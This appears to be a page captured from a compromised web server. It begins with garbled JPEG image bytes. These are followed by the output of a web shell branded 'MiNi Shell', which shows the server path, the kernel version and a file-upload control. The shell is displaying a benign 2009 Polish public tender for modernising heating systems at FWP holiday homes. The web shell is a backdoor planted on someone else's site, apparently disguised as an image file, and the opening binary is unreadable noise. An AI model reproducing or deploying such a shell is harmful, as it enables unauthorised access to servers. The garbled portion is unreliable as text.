JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090825/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090825/292882-N-2009.html

<p class="kh_header"><b>Warszawa: Modernizacja systemów grzewczych 
w domach wczasowych FWP Sp. z o.o. z siedzibą w Warszawie (w tym między innymi wykorzystanie energii słonecznej)</b><br>
<b>Numer ogłoszenia: 292882 - 2009; data zamieszczenia: 25.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundusz Wczasów Pracowniczych Sp. z o.o. , ul. Belgradzka 48, 02-793 Warszawa, woj. mazowieckie, tel. 0-22 4468901, faks 0-22 4468902.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fwp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja systemów grzewczych 
w domach wczasowych FWP Sp. z o.o. z siedzibą w Warszawie (w tym między innymi wykorzystanie energii słonecznej).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest termomodernizacja następujących obiektów Zamawiającego:
1)	DW ZIEMOWIT w Jarnołtówku,
2)	DW HYRNY w Zakopanem,
3)	DW HALKA I i II w Kudowie Zdrój,
4)	DW RYBNICZANKA i DW WANDA w Lądku Zdrój,
5)	DW SOPLICOWO w Krynicy Zdrój,
6)	DW STELLA w Krynicy Zdrój,
7)	DW ZDROWIE w Krynicy Zdrój,
8)	DW POSEJDON w Międzyzdrojach,
9)	DW POLONIA w Międzyzdrojach,
10)	DW VICTORIA w Międzyzdrojach,
w trzech etapach, polegających na:

Etap I
Opracowanie audytów oraz koncepcji projektowych i harmonogramów rzeczowo-finansowych 
wraz z  uzyskaniem  akceptacji Zamawiającego.

Etap II
Wykonanie projektów budowlano-wykonawczych,
Opracowanie kosztorysów inwestorskich,
Opracowanie specyfikacji technicznych wykonania i odbioru robót,


Etap III
Uzyskanie wszelkich niezbędnych pozwoleń i decyzji. (na których uzyskanie Zamawiający udzieli upoważnienia wskazanej przez Wykonawcę osobie fizycznej)
Wykonanie robót budowlanych  w oparciu o opracowaną dokumentację.

Dokładny opis przedmiotu zamówienia zawiera Program Funkcjonalno-Użytkowy, stanowiący załącznik do niniejszej specyfikacji istotnych warunków zamówienia, zwanej dalej SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.32.00.00-6, 71.20.00.00-6, 39.37.00.00-3, 45.21.22.12-5, 45.33.10.00-6, 09.33.11.00-9, 45.45.30.00-7, 44.11.24.10-5, 45.22.35.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o udzielenie zamówienia jest zobowiązany wnieść wadium przed upływem terminu składania ofert w wysokości 360 000,00 zł
-trzysta sześdziesiąt tysięcy złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków: 
W przetargu mogą wziąć udział Wykonawcy, którzy spełniają wszystkie niżej wymienione warunki:
1.1	określone w art. 22 ust 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (Dz. U.  z  2007 r. Nr 227 poz. 1655 z późn. zm.), zwanej dalej Prawem zamówień publicznych:
1.1.1.	posiadają uprawnienia do wykonania przedmiotu zamówienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym               i osobami zdolnymi do realizacji zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, co oznacza, że muszą spełniać łącznie niżej wymienione warunki:
1.1.3.	w ciągu ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali łącznie zadania polegające na wykonaniu:
1.1.3.1	przynajmniej jednego projektu sieci preizolowanej o długości min. 1500 mb, która została zrealizowana,
1.1.3.2	minimum trzech konstrukcji wsporczych pod kolektory słoneczne o pow. absorpcji min. 300 m2,
1.1.3.3	 minimum pięciu instalacji kolektorów słonecznych o łącznej powierzchni absorpcyjnej nie mniejszej niż 2000 m2, w tym żadna z nich nie może być mniejsza niż 300 m2. Wymaga się, aby na dzień złożenia ofert jedna z zaprojektowanych instalacji kolektorów słonecznych została zrealizowana. Ponadto łączna wartość inwestycji objętych powyższymi projektami nie może być niższa niż 5 mln zł. brutto, a łączne wynagrodzenie z tytułu wykonania dokumentacji dla powyższych pięciu instalacji nie może być niższe niż 100 tys. zł. brutto. 
1.1.3.4	co najmniej trzech projektów termomodernizacji budynków o pow. ocieplenia min. 3000 m2 na kwotę min. 40 tys. zł. netto każdy,
1.1.3.5	co najmniej jednego projektu budowy lub rozbudowy budynku o kubaturze min. 2000 m3 na kwotę min. 30 tys. zł. netto,
1.1.3.6	co najmniej jednego projektu kotłowni węglowych o mocy min. 600  kW na kwotę min. 20 tys. zł. netto,
1.1.3.7	co najmniej trzech projektów kotłowni gazowych o mocy min. 160 kW na kwotę min. 10 tys. zł. netto każda,
1.1.3.8	przynajmniej jednego projektu technologii basenowej i wentylacji dla obiektu basenowego 
o powierzchni lustra wody nie mniejszej niż 250 m2 i kubaturze hali basenu nie mniejszej niż 10 000 m3,
1.1.4	oraz w ciągu ostatnich pięciu lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali  łącznie zadania polegające na wykonaniu:
1.1.4.1	co najmniej trzech instalacji kolektorów słonecznych o powierzchni absorpcyjnej nie mniejszej niż 250 m2 na kwotę m.in. 600 tys. zł. brutto każda,
1.1.4.2	 sieci preizolowanej c.o. lub c.w.u. o długości co najmniej 1500 mb,
1.1.4.3	co najmniej trzech robót polegających na termomodernizacji  lub ociepleniu budynków techniką lekką mokrą o kubaturze nie mniejszej niż 10 000m3 każdy,
1.1.4.4	co najmniej trzech robót polegających na przebudowie lub rozbudowie budynków o kubaturze nie mniejszej niż 10 000m3, na kwotę nie mniejszą niż 2 mln zł. brutto każda,
1.1.4.5	co najmniej trzech kotłowni gazowych o mocy nie mniejszej niż 160 kW,
1.1.5	przynajmniej dwóch robót polegających na modernizacji technologii basenowej i wentylacji o kubaturze min. 10 000 m3,
1.1.6	dysponują odpowiednio wykwalifikowanym personelem: 
1.1.6.1	osoba bądź osoby z uprawnieniami bez ograniczeń do projektowania i kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych,
1.1.6.2	oraz osoba bądź osoby z uprawnieniami bez ograniczeń do projektowania i kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
1.1.6.3	oraz osoba bądź osoby z uprawnieniami bez ograniczeń do projektowania i kierowania robotami budowlanymi w zakresie konstrukcyjno-budowlanym,
1.1.6.4	oraz osoba bądź osoby z uprawnieniami bez ograniczeń do projektowania i kierowania robotami budowlanymi w zakresie architektonicznym,
1.1.6.5	oraz pracownicy budowlani uczestniczący przy realizacji inwestycji powinni posiadać aktualne badania wysokościowe, w tym co najmniej dwóch pracowników legitymujących się uprawnieniami grupy II do eksploatacji oraz dozoru urządzeń, instalacji i sieci (podstawa prawna: rozporządzenie Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 roku w sprawie szczegółowych zasad stwierdzenia posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.),
1.1.7	znajdują się w sytuacji ekonomicznej  i  finansowej  zapewniającej wykonanie zamówienia, co oznacza, że:
1.1.7.1	posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej  2 mln zł,
1.1.7.2	przedstawią polisę: od odpowiedzialności cywilnej w zakresie prowadzonej  działalności w związku z wykonywanym przedmiotem zamówienia na sumę gwarancyjną stanowiącą kwotę nie mniejszą niż 2.0 mil zł.
1.1.7.3	przedstawią sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres działalności jest krótszy za ten okres. Wykonawca winien wykazać średni obrót z rachunku zysku i strat lub innych dokumentów określające obroty z ostatnich trzech lat obrotowych, a jeśli okres działalności jest krótszy za ten okres w wysokości nie mniejszej niż 9,0 mln. zł za każdy rok obrotowy
1.1.7.4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2  Prawa zamówień publicznych (Dz.U. z 2007 r. Nr 227 poz. 1655 z późn. zm.), 
1.1.8	wniosą wadium spełniające wymagania niniejszej SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na potwierdzenie spełniania warunków podmiotowych udziału w postępowaniu, o których mowa powyżej Wykonawca w ofercie winien zawrzeć następujące dokumenty:
1.1	oświadczenie potwierdzające spełnianie warunków z art. 22 ust. 1 Prawa zamówień publicznych (druk oświadczenia w załączeniu),
1.2	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.3	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające  odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.4	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 4-8 Prawa zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.5	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9  Prawa zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.6	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej odpowiednio stosuje się przepisy § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja  2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.),
1.7	polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, 
1.8	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (formularz dokumentu w załączeniu). Dokumentami potwierdzającymi wykonanie robót z należytą starannością przykładowo mogą być referencje rzetelnego ich wykonania wystawione przez poprzednich Zamawiających, protokoły odbioru końcowego, dokumenty potwierdzające zwrot zabezpieczeń należytego wykonania robót w całości,
1.9	wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie, 
1.10	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, 
1.11	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 1.10, Wykonawca wskazał osoby, którymi będzie dysponował,
1.12	dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.13	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.14	sprawozdanie finansowe albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
2.1	Jeżeli zamówienie realizowane będzie wspólnie przez Wykonawców opisane wyżej warunki musi spełnić każdy z Wykonawców, tzn. każdy z Wykonawców musi złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu oraz dokumenty, o których mowa w pkt 1.2-1.5 oraz 1.7. Wspólnie zostaną złożone pozostałe dokumenty. 
2.2	Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia publicznego ustanowią pełnomocnika reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Stosowne pełnomocnictwo należy dołączyć do oferty. Jeżeli oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający będzie wymagał złożenia przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.
2.3	W związku z finasowaniem przez Fundację EkoFundusz dostawy i montażu kolektorów słonecznzych, wykonawca jest zobowiązany złożyć oświadczenie o korzystaniu w tym zakresie z dostawców lub wykonawców ze Stanów Zjednoczonych, Szwajcarii, Norwegii i (lub) krajów Unii Europejskiej. 
2.4	Do oferty należy załączyć również wszelkie dokumenty wynikające z Programu Funkcjonalno-Użytkowego stanowiącego załącznik do niniejszej Specyfikacji Istotnych Warunków Zamówienia, w szczególności dokumenty potwierdzającej spełnienie stawianych wymagań, karty katalogowe proponowanych kotłów potwierdzające ich parametry techniczne. 
2.5	Do oferty należy załączyć parafowany projekt umowy oraz wymagane pełnomocnictwa.
3.1 Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
3.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.fwp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundusz Wczasów Pracowniczych Sp z o.o. w Warszawie 02-793 Warszawa ul Belgradzka 48 Sekretariat Biura Zarządu.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2009 godzina 13:00, miejsce: Fundusz Wczasów Pracowniczych Sp z o.o. w Warszawie Oddział w Zakopanem  34-500 Zakopane ul Piłsudskiego 20 Sekretariat Dyrektora Oddziału.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com